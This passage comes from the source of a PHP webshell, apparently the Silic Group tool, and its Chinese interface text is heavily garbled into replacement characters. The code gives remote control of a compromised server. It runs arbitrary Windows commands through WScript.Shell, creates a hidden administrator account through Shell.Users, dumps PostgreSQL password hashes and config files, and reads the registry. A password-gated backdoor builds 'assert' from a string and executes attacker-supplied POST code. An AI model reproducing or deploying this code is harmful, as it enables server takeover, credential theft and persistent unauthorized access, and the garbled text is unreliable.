echo '<form method="POST" action="?s=r&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
for($i = 0;$i < $fieldnum;$i++)
{
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
}
echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
}
else
{
$query = 'SHOW TABLE STATUS';
$status = @mysql_query($query,$conn);
while($statu = @mysql_fetch_array($status))
{
$statusize[] = $statu['Data_length'];
$statucoll[] = $statu['Collation'];
}
$query = 'SHOW TABLES FROM '.$_GET['db'].';';
echo '</div><table border="0"><tr>';
echo '<td class="toptd" style="width:550px;"> <20><><EFBFBD><EFBFBD> </td>';
echo '<td class="toptd" style="width:80px;"> <20><><EFBFBD><EFBFBD> </td>';
echo '<td class="toptd" style="width:130px;"> <20>ַ<EFBFBD><D6B7><EFBFBD> </td>';
echo '<td class="toptd" style="width:70px;"> <20><>С </td></tr>';
$result = @mysql_query($query,$conn);
$k = 0;
while($table = mysql_fetch_row($result))
{
echo '<tr><td><a href="?s=r&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
echo '<td><a href="?s=r&db='.$_GET['db'].'&insert='.$table[0].'"> <20><><EFBFBD><EFBFBD> </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?s=r&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> ɾ<><C9BE> </a></td>';
echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
$k++;
}
echo '</table>';
}
}
}
else die('<27><><EFBFBD><EFBFBD>MYSQLʧ<4C><CAA7>,<2C><><EFBFBD><EFBFBD><EFBFBD>µ<EFBFBD>½.<meta http-equiv="refresh" content="0;URL=?s=o">');
if(!$BOOL) echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
return false;
}
//PostgreSQL<51><4C><EFBFBD><EFBFBD>
function Pgr_sql()
{
$pghost=$_POST['pghost'] ? $_POST['pghost']:'';
$pgport=$_POST['pgport'] ? $_POST['pgport']:'';
$pguser=$_POST['pguser'] ? $_POST['pguser']:'postgres';
$pgpass=$_POST['pgpass'] ? $_POST['pgpass']:'';
$pgdb=$_POST['pgdb'] ? $_POST['pgdb']:'postgres';
$pgquery=$_POST['pgsql'] ? $_POST['pgsql']:'select version()';
$pgquery=stripslashes($pgquery);
print<<<END
<script language="javascript">
function pgFull(i){
Str = new Array(6);
Str[0] = "select version();";
Str[1] = "select datname from pg_database;";
Str[2] = "select DISTINCT table_name from information_schema.columns where table_schema !='information_schema' limit 1 offset n;";
Str[3] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
Str[4] = "select usename,passwd from pg_shadow;";
Str[5] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
pgform.pgsql.value = Str[i];
return true;
}
</script>
<div class="actall">
<!--SQL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʼ-->
<p style="font-size:10pt;font-family:Lucida Handwriting,Times New Roman;">
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ͷ˿<EFBFBD>Ϊѡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD>޷<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD>ɳ<EFBFBD><EFBFBD>Բ<EFBFBD><EFBFBD><EFBFBD>д<br>
<EFBFBD><EFBFBD><EFBFBD>ű<EFBFBD>Ĭ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>SQL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>PostgreSQL 8.1<br>
<EFBFBD>ѿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><EFBFBD>ȷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD><br>
<EFBFBD>б<EFBFBD><EFBFBD>ο<EFBFBD><EFBFBD><EFBFBD>select relname from pg_stat_user_tables limit 1 offset n;<br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>PostgreSQL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɲμ<EFBFBD><a href="http://nana.blackbap.org/?p=archive&id=55" target="_blank">[<EFBFBD><EFBFBD><EFBFBD><EFBFBD>]</a><br><hr></p>
<form name="pgform" method="POST" action="?s=pq">
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:<input type="text" name="pghost" value="{$pghost}" style="width:100px">
<EFBFBD>û<EFBFBD>:<input type="text" name="pguser" value="{$pguser}" style="width:100px">
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD>:<input type="text" name="pgdb" value="{$pgdb}" style="width:100px"><br><br>
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
<EFBFBD>˿ڣ<EFBFBD><input type="text" name="pgport" value="{$pgport}" style="width:50px">
<select onchange="return pgFull(options[selectedIndex].value)">
<option value="0" selected><EFBFBD><EFBFBD>ʾ<EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD></option>
<option value="2"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="3"><EFBFBD>ֶ<EFBFBD></option>
<option value="4">hashes</option>
<option value="5">pg_hb.conf</option>
</select>
<input type="hidden" name="sql" value="YoCo Smart">
<input type="submit" value="ִ<EFBFBD><EFBFBD>SQL<EFBFBD><EFBFBD><EFBFBD><EFBFBD>">
<font style="font-size:10pt;">&nbsp;&nbsp;<a href="http://blackbap.org" target="_blank">Silic</a>&copy;2009-2012</font></form>
<!--SQL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-->
END;
if(!empty($pghost) && !empty($pgport)){
$conn="host=".$pghost." port=".$pgport." dbname=".$pgdb." user=".$pguser." password=".$pgpass;
}else{
$conn="dbname=".$pgdb." user=".$pguser." password=".$pgpass;
}
if(!empty($_POST['sql'])){
$pgconn = pg_connect($conn)
or die('<27><><EFBFBD><EFBFBD><E7A3AC><EFBFBD><EFBFBD><EFBFBD>ϡ<EFBFBD><CFA1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ:'.pg_last_error());
$pgresult=pg_query($pgquery) or die('SQLִ<4C>з<EFBFBD><D0B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:<br>'.pg_last_error());
$pgrow=pg_fetch_row($pgresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
for ($i=0; $i< pg_num_fields($pgresult); $i++)
{echo '<td><b>'.pg_field_name($pgresult, $i)."</b></td>\n";}
echo "</tr>\n";
pg_result_seek($pgresult, 0);
while ($pgrow=pg_fetch_row($pgresult))
{
echo "<tr>\n";
for ($i=0; $i<pg_num_fields($pgresult); $i++ )
{echo '<td>'."$pgrow[$i]".'</td>';}
echo "</tr>\n";
}
echo "</table>\n"."</font>";
pg_free_result($pgresult);
pg_close();
}
echo "</div>";
}
function Mysql_o()
{
ob_start();
if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
{
if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
{
$cookietime = time() + 24 * 3600;
setcookie('m_silichost',$_POST['mhost'],$cookietime);
setcookie('m_silicport',$_POST['mport'],$cookietime);
setcookie('m_silicuser',$_POST['muser'],$cookietime);
setcookie('m_silicpass',$_POST['mpass'],$cookietime);
die('<27><><EFBFBD>ڵ<EFBFBD>½,<2C><><EFBFBD>Ժ<EFBFBD>...<meta http-equiv="refresh" content="0;URL=?s=r">');
}
}
print<<<END
<form method="POST" name="oform" id="oform" action="?s=o">
<div class="actall"><EFBFBD><EFBFBD>ַ <input type="text" name="mhost" value="localhost" style="width:300px"></div>
<div class="actall"><EFBFBD>˿<EFBFBD> <input type="text" name="mport" value="3306" style="width:300px"></div>
<div class="actall"><EFBFBD>û<EFBFBD> <input type="text" name="muser" value="root" style="width:300px"></div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="mpass" value="" style="width:300px"></div>
<div class="actall"><input type="submit" value="<EFBFBD><EFBFBD>½" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?s=r';"></div>
</form>
END;
ob_end_flush();
return true;
}
function zipact()
{
$zfile=$_POST['zfile'] ? $_POST['zfile']:'php.zip';
$jypt=$_POST['jypt'] ? $_POST['jypt']:'./';
$tip="δ<EFBFBD><EFBFBD>ʼ<EFBFBD><EFBFBD>ѹ";
if($_POST['zip']=='zip'){
if(function_exists(zip_open)){
$zfile=key_exists('zip', $_GET) && $_GET['zip']?$_GET['zip']:$zfile;
$zfile= str_replace(array(dirname(__FILE__)."/",dirname(__FILE__)."\\"),array("",""),$zfile);
$zpath=str_replace('\\','/',dirname(__FILE__)).'/'.$zfile;
if(!is_file($zpath)){$tip='<27>ļ<EFBFBD>"'.$zpath.'"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!';}else{
$zip= new ZipArchive();
$rs=$zip->open($zpath);
if($rs !== TRUE){$tip='<27><>ѹʧ<D1B9><CAA7>:'.$rs;}
$zip->extractTo($jypt);
$zip->close();
$tip=$zfile.'<27><>ѹ<EFBFBD>ɹ<EFBFBD>!';}
}else{$tip="<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֧<EFBFBD><EFBFBD>PHP_ZIP<EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><>ȷ<EFBFBD><C8B7>";}
}
print<<<END
<div class="actall">
<form action="?s=za" method="POST">
<input type="hidden" name="zip" id="zip" value="zip">
<EFBFBD><EFBFBD>ģ<EFBFBD><EFBFBD>ʹ<EFBFBD><EFBFBD>PHP<EFBFBD><EFBFBD>zip_open<EFBFBD><EFBFBD>չ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ZIPѹ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><br>
ʹ<EFBFBD><EFBFBD>ǰ<EFBFBD><EFBFBD><EFBFBD>ڡ<EFBFBD><b><a href="?s=f">ϵͳ<EFBFBD><EFBFBD>Ϣ</a></b><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȷ<EFBFBD><EFBFBD>ϵͳ֧<EFBFBD><EFBFBD>php_zip<br>
ѹ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD>¼<EFBFBD>Ŀ¼<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<EFBFBD>Ƿ<EFBFBD><EFBFBD>ɲ<EFBFBD><EFBFBD><EFBFBD>δ<EFBFBD><EFBFBD><EFBFBD><EFBFBD> :-(<br>
ȷ<EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<br><br>
ѹ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
<input type="text" name="zfile" id="zfile" value="{$zfile}" style="width:720px;"><br><br>
Ŀ<EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<input type="text" name="jypt" id="jypt" value="{$jypt}" style="width:720px;"><br><br>
<input type="submit" value="<EFBFBD><EFBFBD>ʼ<EFBFBD><EFBFBD>ѹ" style="width:80px;"><br><br><br>
{$tip}<br><br><br></form></div>
END;
}
//Windows<77><73><EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>
function winshell()
{
$nop='&nbsp;&nbsp;';
if($_GET['winshell']=='wscript'){
$wcmd=$_POST['wcmd'] ? $_POST['wcmd']:'net user';
$wcpth=$_POST['wcpth'] ? $_POST['wcpth']:'cmd.exe';
print<<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·<EFBFBD><EFBFBD><br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ<EFBFBD><EFBFBD>" style="width:80px;">
<br><br><br></form></div>
END;
if($_POST['do']=='do'){
$ww=$wcpth." /c ".$wcmd;
$phpwsh=new COM("Wscript.Shell") or die("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Shell.Wscript<70><74><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>");
$phpexec=$phpwsh->exec($ww);
$execoutput=$wshexec->stdout();
$result=$execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh=NULL;
}
}elseif($_GET['winshell']=='shelluser'){
$wuser=$_POST['wuser'] ? $_POST['wuser']:'silic';
$wpasw=$_POST['wpasw'] ? $_POST['wpasw']:'1234@silic#';
print<<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӹ<EFBFBD><EFBFBD><EFBFBD>Ա<br><br>
{$nop}<EFBFBD>½<EFBFBD><EFBFBD>û<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}<EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><EFBFBD><EFBFBD><EFBFBD><input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" style="width:80px;">
<br><br><br></form></div>
END;
if($_POST['do']='do'){
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw,"");
$cmd->setting["AccountType"] = 3;
}
}elseif($_GET['winshell']=='regedit'){
$regpath=$_POST['regpath'] ? $_POST['regpath']:'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
print<<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(Shell.Wscript<EFBFBD><EFBFBD><EFBFBD><EFBFBD>)<br><br>
ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="<EFBFBD><EFBFBD>ȡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" style="width:80px;">
<br><br><br></form></div>
END;
if($_POST['do']=='do'){
$shell = new COM("WScript.Shell") or die("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Shell.Wscript<70><74><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>");
try{$registry_proxystring = $shell->RegRead($regpath);}
catch(Exception $e){echo '<27><><EFBFBD><EFBFBD>: '.$e->getMessage();}
echo $registry_proxystring;
}
}else{
$tip="<EFBFBD>ݲ<EFBFBD><EFBFBD>Ա<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܿ<EFBFBD><EFBFBD>õĿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>֮һ<br>Webshell<6C><6C><EFBFBD>ڷ<EFBFBD><DAB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ΪWindowsϵͳ<br>PHP<48><50>Ȩ<EFBFBD><C8A8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EEA3AC><EFBFBD><EFBFBD><EFBFBD>ڷdz<DAB7><C7B3><EFBFBD><EFBFBD>ε<EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD><EFBFBD>Գ<EFBFBD><D4B3>Ա<EFBFBD><D4B1><EFBFBD><EFBFBD><EFBFBD><br></h5><br><br><br>";
print<<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript<EFBFBD><EFBFBD><EFBFBD><EFBFBD> ] </a><br><br>
<h5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><EFBFBD>PHP<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Windows<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>Wscript<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
WscriptΪ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>cmd<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User<EFBFBD><EFBFBD><EFBFBD><EFBFBD> ] </a><br><br>
<h5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><EFBFBD>PHP<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Windows<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>Shell.user<EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
USER<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ΪWindowsϵͳ<EFBFBD>û<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡ ] </a><br><br>
<h5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><EFBFBD>PHP<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Windows<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>Shell.Wscript<EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
RegRead()<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡϵͳע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>{$tip}</pre></div>
END;
}
}
/**<2A><>½<EFBFBD><C2BD><EFBFBD>ؿ<EFBFBD>ʼ**/
if($_GET['s'] == 'logout'){
setcookie('admin_silicpass',NULL);
die('<meta http-equiv="refresh" content="0;URL=?">');
}elseif($_GET['s'] == 'ch'){
$oldps=md5(md5(md5(trim($salt.$_POST['oldps']))));
$newps=base64_encode(base64_decode('JHBhc3N3b3JkPSI=').md5(md5(md5(trim($salt.$_POST['newps'])))).base64_decode('Ijs='));
print<<<END
<div class="actall"><form action="?s=ch" method="POST">
<input type="hidden" name="ch" id="ch" value="ch"><br>
* <EFBFBD>޸ı<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>½<EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<EFBFBD><EFBFBD><EFBFBD>ܻ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɳ<EFBFBD><EFBFBD><EFBFBD>ʧȥ<EFBFBD><EFBFBD>Ӧ)<br>
* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><a href="http://blackbap.org" _target"_blank">Silic Group</a><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Spiderľ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǻ<EFBFBD><EFBFBD><EFBFBD>Spiderľ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܵĵ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>¿<EFBFBD><EFBFBD><EFBFBD><br>
* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>MD5+Salt<EFBFBD><EFBFBD><EFBFBD>ܼӶ<EFBFBD><EFBFBD><EFBFBD>session<EFBFBD><EFBFBD><EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɲ<EFBFBD><EFBFBD>ص<EFBFBD><EFBFBD>ı<EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><EFBFBD><EFBFBD>£<EFBFBD>ɾȥFTP<EFBFBD><EFBFBD><EFBFBD><EFBFBD>,ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,Shellcodeת<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƺͷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>еĹ<EFBFBD><EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>й<EFBFBD><EFBFBD>ܵIJ<EFBFBD><EFBFBD><EFBFBD>bug<EFBFBD><EFBFBD><EFBFBD>Ż<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
* Silic Group Hacker Army - <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ԭ<EFBFBD><EFBFBD>,<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
* <a href="http://blackbap.org" target="_blank">BlackBap.Org</a><br><br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><input type="text" name="oldps" id="oldps" value="" style="width:120px;"><br />
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><input type="text" name="newps" id="newps" value="" style="width:120px;"><br>
<input type="submit" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" style="width:80px;">
<br><br><br></form></div>
END;
if($_POST['ch']='ch' && $oldps==$password && !empty($_POST['newps']))
{
$dline=19;
$chpsArr=file(__FILE__);
$chsize=count($chpsArr);
for($chi=0; $chi< $chsize; $chi++){
if($chi==$dline-1){$chpsStr.=base64_decode($newps)."\r\n";}
else{$chpsStr.=$chpsArr[$chi];}
}
file_put_contents(__FILE__,$chpsStr);
echo "<EFBFBD><EFBFBD><EFBFBD>ijɹ<EFBFBD>";
}else{echo "û<EFBFBD>и<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>";}
}elseif(md5(md5(md5($salt.trim($_GET['s'])))) == $password){
$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4};
@$asse($_POST[$_GET['s']]);
}else{
//<2F><>½
function Root_Login($MSG_TOP)
{
$IP = gethostbyname($_SERVER["SERVER_NAME"]);
print<<<END
<html>
<body style="background:#AAAAAA;">
<center>
<form method="POST">
<div style="width:351px;height:201px;margin-top:100px;background:threedface;border-color:#FFFFFF #999999 #999999 #FFFFFF;border-style:solid;border-width:1px;">
<div style="width:350px;height:22px;padding-top:2px;color:#FFFFFF;background:#293F5F;clear:both;"><b>{$MSG_TOP}</b></div>
<div style="width:350px;height:80px;margin-top:50px;color:#000000;clear:both;">PASS:<input type="password" name="silicpass" style="width:270px;"></div>
<div style="width:350px;height:30px;clear:both;"><input type="submit" value="LOGIN" style="width:80px;"></div>
</div>
</form>
</center>
</body>
</html>
END;
return false;
}
//<2F><><EFBFBD><EFBFBD>
function WinMain()
{
$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
$Server_OS = PHP_OS;
$Server_Soft = $_SERVER["SERVER_SOFTWARE"];
print<<<END
<html><head><title><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ</title>
<style type="text/css">
*{padding:0; margin:0;}
body{background:#AAAAAA;font-family:"Verdana", "Tahoma","<22><><EFBFBD><EFBFBD>",sans-serif;font-size:13px;text-align:center;margin-top:5px;word-break:break-all;}
a{color:#FFFFFF;text-decoration:none;}
a:hover{background:#BBBBBB;}
.outtable{margin: 0 auto;height:595px;width:955px;color:#000000;border-top-width: 2px;border-right-width:2px;border-bottom-width: 2px;border-left-width: 2px;border-top-style: outset;border-right-style: outset;border-bottom-style: outset;border-left-style: outset;border-top-color: #FFFFFF;border-right-color: #8c8c8c;border-bottom-color: #8c8c8c;border-left-color: #FFFFFF;background-color: threedface;}
.topbg{padding-top:3px;font-size:12px;text-align:left;font-weight:bold;height:22px;width:950px;color:#FFFFFF;background:#293F5F;}
.listbg{font-family:'lucida grande',tahoma,helvetica,arial,'bitstream vera sans',sans-serif;font-size:13px;width:130px;}
.listbg li{padding:3px;color:#000000;height:25px;display:block;line-height:26px;text-indent:0px;}
.listbg li a{padding-top:2px;background:#BBBBBB;color:#000000;height:25px;display:block;line-height:24px;text-indent:0px;border-color:#999999 #999999 #999999 #999999;border-style:solid;border-width:1px;text-decoration:none;}
.footer{padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:20px;width:950px;color:#000000;background: #888888;}
</style>
<script language="JavaScript">
function switchTab(tabid)
{
if(tabid == '') return false;
for(var i=0;i<=15;i++)
{
if(tabid == 't_'+i) document.getElementById(tabid).style.background="#FFFFFF";
else document.getElementById('t_'+i).style.background="#BBBBBB";
}
return true;
}
</script>
</head>
<body>
<div class="outtable">
<div class="topbg">&nbsp;<a href="?s=logout" title="<EFBFBD>˳<EFBFBD>"><EFBFBD><EFBFBD></a>&nbsp;<EFBFBD><EFBFBD>&nbsp;<a href="?s=ch" target="main" title="<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"><EFBFBD><EFBFBD></a>&nbsp;{$Server_IP} - {$Server_OS} - {$Server_Soft}</div>
<div style="height:546px;">
<table width="100%" height="100%" border=0 cellpadding="0" cellspacing="0">
<tr><td width="140" align="center" valign="top">
<ul class="listbg">
<li><a href="?s=a" id="t_0" onclick="switchTab('t_0')" style="background:#FFFFFF;" target="main"><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a></li>
<li><a href="?s=g" id="t_1" onclick="switchTab('t_1')" target="main">ִ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a></li>
<li><a href="?s=i" id="t_2" onclick="switchTab('t_2')" target="main">ɨ<EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD></a></li>
<li><a href="?s=f" id="t_3" onclick="switchTab('t_3')" target="main">ϵͳ<EFBFBD><EFBFBD>Ϣ</a></li>
<li><a href="?s=n" id="t_4" onclick="switchTab('t_4')" target="main">MYSQLִ<EFBFBD><EFBFBD></a></li>
<li><a href="?s=o" id="t_5" onclick="switchTab('t_5')" target="main">MYSQL<EFBFBD><EFBFBD><EFBFBD><EFBFBD></a></li>
<li><a href="?s=pq" id="t_6" onclick="switchTab('t_6')" target="main">PostgreSQL</a></li>
<li><a href="?s=gg" id="t_7" onclick="switchTab('t_7')" target="main"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD></a></li>
<li><a href="?s=e" id="t_8" onclick="switchTab('t_8')" target="main">ɨ<EFBFBD><EFBFBD>ľ<EFBFBD><EFBFBD></a></li>
<li><a href="?s=j" id="t_9" onclick="switchTab('t_9')" target="main"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></a></li>
<li><a href="?s=d" id="t_10" onclick="switchTab('t_10')" target="main"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a></li>
<li><a href="?s=l" id="t_11" onclick="switchTab('t_11')" target="main">ServU<EFBFBD><EFBFBD>Ȩ</a></li>
